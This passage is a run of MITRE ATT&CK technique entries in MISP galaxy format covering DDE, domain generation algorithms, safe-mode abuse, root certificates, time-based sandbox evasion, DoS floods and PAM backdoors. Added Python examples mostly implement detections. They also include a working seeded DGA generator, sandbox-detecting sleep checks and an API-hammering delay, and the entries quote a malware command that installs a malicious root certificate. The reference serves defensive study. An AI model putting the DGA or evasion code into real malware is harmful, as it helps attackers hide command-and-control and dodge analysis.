Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)

Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection)

DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002"

Table 5738. Table References

Links

https://attack.mitre.org/techniques/T1559/002

https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/

https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/

https://owasp.org/www-community/attacks/CSV_Injection

https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021

https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee

https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

https://technet.microsoft.com/library/security/4053440

https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/

https://www.contextis.com/blog/comma-separated-vulnerabilities

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Domain Generation Algorithms - T1568.002

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc.). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)

Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
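The two DGA shapes described above (letter-based and word-based, both time-seeded) and the two detection signals defenders usually pair them with are shown below as an added example in Python. It is not code from the MISP galaxy, MITRE ATT&CK or any malware family: the hash-based generator, the TLD rotation, the wordlist, the entropy and vowel thresholds and the DNS log rows are all constructed for this illustration.

```python
import hashlib
import math
from collections import Counter
from datetime import date

TLDS = ("ru", "net", "com", "info")   # assumed TLD rotation, not a real family's
WORDS = ("city", "july", "dish", "river", "stone", "north", "field", "gate")  # assumed wordlist
SAMPLE_DAY = date(2023, 5, 1)
NEXT_DAY = date(2023, 5, 2)


def letter_dga(seed, day, count=5, length=16):
    """Letter-based, time-seeded DGA: each (seed, day, index) hashes to a label
    of `length` lowercase letters. Same seed and day give the same list, so the
    operator can pre-register one of the day's candidates."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}|{day.isoformat()}|{i}".encode()).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:length])
        domains.append(f"{label}.{TLDS[digest[-1] % len(TLDS)]}")
    return domains


def word_dga(seed, day, count=5):
    """Word-based variant: concatenates dictionary words chosen by the same hash
    stream, giving pronounceable names in the style of cityjulydish.net."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}|{day.isoformat()}|w{i}".encode()).digest()
        label = "".join(WORDS[b % len(WORDS)] for b in digest[:3])
        domains.append(f"{label}.{TLDS[digest[-1] % len(TLDS)]}")
    return domains


def shannon_entropy(label):
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def vowel_ratio(label):
    return sum(ch in "aeiou" for ch in label) / max(len(label), 1)


def looks_generated(domain, entropy_threshold=3.4, vowel_threshold=0.3):
    """Lexical heuristic: a high-entropy, vowel-poor second-level label.
    Thresholds are assumptions for this example. Catches letter-based DGAs;
    word-based names pass, which is why the NXDOMAIN signal below matters."""
    label = domain.lower().rsplit(".", 1)[0]
    return shannon_entropy(label) > entropy_threshold and vowel_ratio(label) < vowel_threshold


def nxdomain_burst_hosts(dns_log, threshold=20):
    """Clients that received NXDOMAIN for at least `threshold` distinct names.
    A DGA client walks its candidate list until one resolves, so it fails many
    lookups in a short period regardless of how the names look.
    dns_log rows are (client, qname, rcode)."""
    failed = {}
    for client, qname, rcode in dns_log:
        if rcode == "NXDOMAIN":
            failed.setdefault(client, set()).add(qname.lower())
    return {c for c, names in failed.items() if len(names) >= threshold}


# Constructed DNS log: one infected host walks 25 generated names, one normal
# host mistypes two names.
SAMPLE_DNS_LOG = [("10.0.0.5", d, "NXDOMAIN") for d in letter_dga("k3", SAMPLE_DAY, count=25)]
SAMPLE_DNS_LOG += [("10.0.0.9", "github.com", "NOERROR"),
                   ("10.0.0.9", "gihtub.com", "NXDOMAIN"),
                   ("10.0.0.9", "googel.com", "NXDOMAIN")]

if __name__ == "__main__":
    print(letter_dga("k3", SAMPLE_DAY, 3), word_dga("k3", SAMPLE_DAY, 3))
    print(nxdomain_burst_hosts(SAMPLE_DNS_LOG))
```

The lexical check flags the gibberish example from the text and passes the word-based one, which is the expected failure mode; in a real pipeline the NXDOMAIN burst count is the signal that holds for both shapes, and sinkholing a registered candidate gives the seed needed to reproduce tomorrow's list.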

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002"

Table 5739. Table References

Links

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

http://csis.pace.edu/ctappert/srd2017/2017PDF/d4.pdf

http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf

https://arxiv.org/pdf/1611.00791.pdf

https://attack.mitre.org/techniques/T1568/002

https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/

https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

Safe Mode Boot - T1562.009

Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)

Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)
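The two checks a responder would run for this technique, as an added Python example that is not part of the page or of any vendor tool: look for a `safeboot` element left in the BCD, and diff the `SafeBoot\Minimal` / `SafeBoot\Network` subkey lists against a known-good snapshot. The `bcdedit /enum` text, the baseline lists and the `SuperBackupSvc` entry are constructed for the example; `collect_live()` gathers the same inputs on a real Windows host.

```python
import re
import sys

# Constructed `bcdedit /enum` output for a host forced into Safe Mode with
# Networking on its next boot.
SAMPLE_BCDEDIT = """\
Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=\\Device\\HarddiskVolume1
description             Windows Boot Manager

Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \\Windows\\system32\\winload.efi
description             Windows 10
safeboot                Network
safebootalternateshell  Yes
"""

# Constructed, partial subkey lists; a real baseline is captured from a clean
# host of the same build. SuperBackupSvc stands in for an adversary-added key.
BASELINE_SAFEBOOT = {"Minimal": ["AppInfo", "Base", "vga.sys"],
                     "Network": ["AppInfo", "Base", "NetworkProvider"]}
CURRENT_SAFEBOOT = {"Minimal": ["AppInfo", "Base", "vga.sys", "SuperBackupSvc"],
                    "Network": ["AppInfo", "Base", "NetworkProvider"]}


def safeboot_entries(bcdedit_output):
    """(identifier, element, value) for every boot entry carrying a safeboot
    element. A clean host has none; `bcdedit /deletevalue {id} safeboot`
    clears it."""
    findings, ident = [], None
    for line in bcdedit_output.splitlines():
        m = re.match(r"^([A-Za-z]\w*)\s+(\S.*?)\s*$", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "identifier":
            ident = value
        elif key in ("safeboot", "safebootalternateshell"):
            findings.append((ident, key, value))
    return findings


def unexpected_safeboot_services(current, baseline):
    """Subkeys under SafeBoot\\Minimal or SafeBoot\\Network that the baseline
    does not have: services or drivers registered so they still start after
    a safe-mode boot, when the EDR agent does not."""
    extra = {}
    for mode in ("Minimal", "Network"):
        added = sorted(set(current.get(mode, ())) - set(baseline.get(mode, ())))
        if added:
            extra[mode] = added
    return extra


def collect_live():
    """Windows-only: read the same two inputs from the running host."""
    if sys.platform != "win32":
        raise RuntimeError("collect_live() needs Windows")
    import subprocess
    import winreg
    bcd = subprocess.run(["bcdedit", "/enum"], capture_output=True, text=True, check=True).stdout
    lists = {}
    for mode in ("Minimal", "Network"):
        path = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\" + mode
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            count = winreg.QueryInfoKey(key)[0]
            lists[mode] = [winreg.EnumKey(key, i) for i in range(count)]
    return bcd, lists


if __name__ == "__main__":
    print(safeboot_entries(SAMPLE_BCDEDIT))
    print(unexpected_safeboot_services(CURRENT_SAFEBOOT, BASELINE_SAFEBOOT))
```

Because the BCD change only takes effect at the next reboot, the `safeboot` element is visible in the window between the adversary setting it and the restart; an alert on `bcdedit.exe` with `/set` and `safeboot` on the command line catches the same thing earlier.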

The tag is: misp-galaxy:mitre-attack-pattern="Safe Mode Boot - T1562.009"

Table 5740. Table References

Links

https://attack.mitre.org/techniques/T1562/009

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit

https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg

https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/

https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234

https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/

https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise

https://www.cybereason.com/blog/medusalocker-ransomware

Create Cloud Instance - T1578.002

An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)

Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.

The tag is: misp-galaxy:mitre-attack-pattern="Create Cloud Instance - T1578.002"

Table 5741. Table References

Links

https://attack.mitre.org/techniques/T1578/002

https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/

https://cloud.google.com/logging/docs/audit#admin-activity

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs

Code Signing Certificates - T1587.002

Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1587.002"

Table 5742. Table References

Links

https://attack.mitre.org/techniques/T1587/002

https://en.wikipedia.org/wiki/Code_signing

Purchase Technical Data - T1597.002

Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.

Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Purchase Technical Data - T1597.002"

Table 5743. Table References

Links

https://attack.mitre.org/techniques/T1597/002

https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/

Virtual Private Server - T1583.003

Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.

Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)

The tag is: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1583.003"

Table 5744. Table References

Links

https://attack.mitre.org/techniques/T1583/003

https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Install Root Certificate - T1553.004

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root’s chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted, an error message is displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)

In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004"

Table 5745. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

https://attack.mitre.org/techniques/T1553/004

https://docs.microsoft.com/sysinternals/downloads/sigcheck

https://en.wikipedia.org/wiki/Root_certificate

https://objective-see.com/blog/blog_0x26.html

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/

https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/

Virtual Private Server - T1584.003

Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)

Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.

The tag is: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1584.003"

Table 5746. Table References

Links

https://attack.mitre.org/techniques/T1584/003

https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Time Based Evasion - T1497.003

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.

Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)

Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)

Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment’s timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)
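The timing check described in the last paragraph, together with a sleep-free delay of the API-hammering kind, as an added Python example that is not part of the page. The verdict thresholds are assumptions; the point is the comparison of a requested delay against two independent clocks, which is what lets a sample tell a sandbox that hooks `sleep` (the call returns early) from one that fast-forwards the system clock (the two clocks disagree).

```python
import os
import time


def classify_sleep(requested, wall_elapsed, mono_elapsed, tolerance=0.25):
    """Pure decision logic, separated so it can be tested without sleeping.
    requested:    seconds the sample asked to sleep
    wall_elapsed: time.time() delta (system clock, which a sandbox can set)
    mono_elapsed: time.monotonic() delta (independent of the system clock)
    'skipped'    the sleep returned early: the sleep call was hooked
    'clock_jump' the clocks disagree: the system clock was moved forward so
                 the sample would believe the delay had elapsed
    'normal'     both clocks agree with the request within tolerance"""
    lower = requested * (1 - tolerance)
    if mono_elapsed < lower or wall_elapsed < lower:
        return "skipped"
    if abs(wall_elapsed - mono_elapsed) > max(requested * tolerance, 0.05):
        return "clock_jump"
    return "normal"


def measure_sleep(seconds):
    """Sample both clocks around a real sleep and classify the result."""
    wall0, mono0 = time.time(), time.monotonic()
    time.sleep(seconds)
    wall_elapsed = time.time() - wall0
    mono_elapsed = time.monotonic() - mono0
    return {"requested": seconds, "wall": wall_elapsed, "mono": mono_elapsed,
            "verdict": classify_sleep(seconds, wall_elapsed, mono_elapsed)}


def api_hammer_delay(min_seconds):
    """Stall without calling sleep: loop over cheap, benign API calls until the
    monotonic clock shows min_seconds have passed. A sleep hook does not help
    the sandbox here; it must wait it out or time the sample out, which is the
    trade-off the technique exploits. Returns the number of iterations, itself
    a crude signal (an environment that accelerates the clock completes far
    fewer calls per apparent second than real hardware)."""
    calls = 0
    start = time.monotonic()
    while time.monotonic() - start < min_seconds:
        os.getpid()
        time.localtime()
        calls += 1
    return calls


if __name__ == "__main__":
    print(measure_sleep(0.2))
    print(api_hammer_delay(0.2), "calls")
```

On the defensive side the same comparison is why sandboxes that patch only `Sleep`/`GetTickCount` are detected: they must keep every readable time source consistent, including high-resolution counters, or the mismatch itself becomes the evasion trigger.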

The tag is: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003"

Table 5747. Table References

Links

https://attack.mitre.org/techniques/T1497/003

https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/

https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes

https://www.joesecurity.org/blog/3660886847485093803

https://www.joesecurity.org/blog/498839998833561473

https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique

Application Exhaustion Flood - T1499.003

Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)
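A detection for this pattern, as an added Python example that is not part of the page: a sliding-window counter over web server access logs that reports clients repeatedly hitting endpoints known to be expensive. The combined-format log lines, the client addresses, the expensive-path prefixes and the thresholds are all constructed for the example.

```python
import re
from collections import deque
from datetime import datetime

# Constructed combined-format lines: 203.0.113.7 hits the search endpoint 30
# times in 30 seconds; 198.51.100.4 browses normally.
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Oct/2023:13:55:{i:02d} +0000] '
    f'"GET /search?q=%25{i}%25&sort=relevance HTTP/1.1" 200 48211 "-" "curl/8.0"'
    for i in range(30)
] + [
    '198.51.100.4 - - [10/Oct/2023:13:55:03 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2023:13:55:10 +0000] "GET /search?q=lamp HTTP/1.1" 200 30211 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2023:13:56:41 +0000] "GET /product/42 HTTP/1.1" 200 8802 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\d+|-)')
EXPENSIVE_PREFIXES = ("/search", "/export", "/report")   # assumed for this site


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status, _size = m.groups()
    return {"client": client, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": target.split("?", 1)[0], "status": int(status)}


def expensive_endpoint_floods(lines, window_seconds=60, threshold=20, prefixes=EXPENSIVE_PREFIXES):
    """Clients that request expensive endpoints at least `threshold` times inside
    any window of `window_seconds`. Lines are assumed to be in time order per
    client, as they are in a server log. Returns {client: peak count}."""
    recent = {}
    peaks = {}
    for rec in filter(None, map(parse_line, lines)):
        if not rec["path"].startswith(prefixes):
            continue
        q = recent.setdefault(rec["client"], deque())
        q.append(rec["time"])
        while (rec["time"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            peaks[rec["client"]] = max(peaks.get(rec["client"], 0), len(q))
    return peaks


if __name__ == "__main__":
    print(expensive_endpoint_floods(SAMPLE_LOG))
```

Counting only the expensive paths, rather than all requests, is what separates this from a generic rate limiter: a client can stay well under the global request rate while still exhausting a database or rendering pool through a handful of slow endpoints.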

The tag is: misp-galaxy:mitre-attack-pattern="Application Exhaustion Flood - T1499.003"

Table 5748. Table References

Links

https://attack.mitre.org/techniques/T1499/003

https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

Pluggable Authentication Modules - T1556.003

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)

Adversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)

Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials: because PAM does not store passwords, the values exchanged with PAM components may be plain text.(Citation: PAM Creds)(Citation: Apple PAM)
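An integrity check for both abuses above (an added module slipped into a PAM stack, and a patched module file), as an added Python example that is not part of the page or of any distribution's tooling. The `/etc/pam.d/sshd` text, the allowlist, the `pam_rescue.so` name and the module bytes are constructed; on a real host the baseline digests come from the package manager (`dpkg --verify libpam-modules` or `rpm -V pam`).

```python
import hashlib

# Constructed /etc/pam.d/sshd. The pam_rescue.so line stands in for an
# adversary-added module; the name is hypothetical.
SAMPLE_PAM_SSHD = """\
# PAM configuration for the Secure Shell service (constructed sample)
@include common-auth
auth    [success=1 default=ignore]  pam_unix.so nullok
auth    sufficient                  pam_rescue.so
-session optional                   pam_systemd.so
account required                    pam_nologin.so
session required                    pam_limits.so
"""

# Modules the sshd stack on this (assumed) build is allowed to reference.
ALLOWED_MODULES = {"pam_unix.so", "pam_systemd.so", "pam_nologin.so", "pam_limits.so"}


def parse_pam(text):
    """Return [{type, control, module, args, optional}] per rule line. Handles
    the bracketed control syntax ([success=1 default=ignore]) and the leading
    '-' that marks a module whose absence is not an error; @include lines come
    back with type 'include' so the caller can follow them."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("@include"):
            rules.append({"type": "include", "control": None, "module": line.split(None, 1)[1],
                          "args": [], "optional": False})
            continue
        tokens = line.split()
        optional = tokens[0].startswith("-")
        mtype = tokens[0].lstrip("-")
        if tokens[1].startswith("["):
            end = next((i for i, tok in enumerate(tokens) if i > 0 and tok.endswith("]")), 1)
            control, rest = " ".join(tokens[1:end + 1]), tokens[end + 1:]
        else:
            control, rest = tokens[1], tokens[2:]
        rules.append({"type": mtype, "control": control, "module": rest[0],
                      "args": rest[1:], "optional": optional})
    return rules


def unknown_modules(rules, allowed=ALLOWED_MODULES):
    """Rule lines referencing a module outside the allowlist. A `sufficient`
    entry here is the classic backdoor shape: it ends the stack successfully on
    its own say-so, so pam_unix.so never gets to reject the password."""
    return [(r["type"], r["control"], r["module"]) for r in rules
            if r["type"] != "include" and r["module"] not in allowed]


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def modified_modules(observed, baseline):
    """Module files whose SHA-256 differs from the package baseline, which is
    how a patched pam_unix.so (hard-coded password, or cleartext logging of the
    password it is handed) shows up. observed: {name: bytes}; baseline: {name: hex}."""
    return sorted(name for name, data in observed.items() if baseline.get(name) != sha256_hex(data))


# Constructed module contents: the baseline is hashed from the pristine bytes,
# then pam_unix.so is "patched" by appending a string.
PRISTINE = {"pam_unix.so": b"\x7fELF pristine pam_unix", "pam_limits.so": b"\x7fELF pam_limits"}
BASELINE_HASHES = {name: sha256_hex(data) for name, data in PRISTINE.items()}
OBSERVED = dict(PRISTINE)
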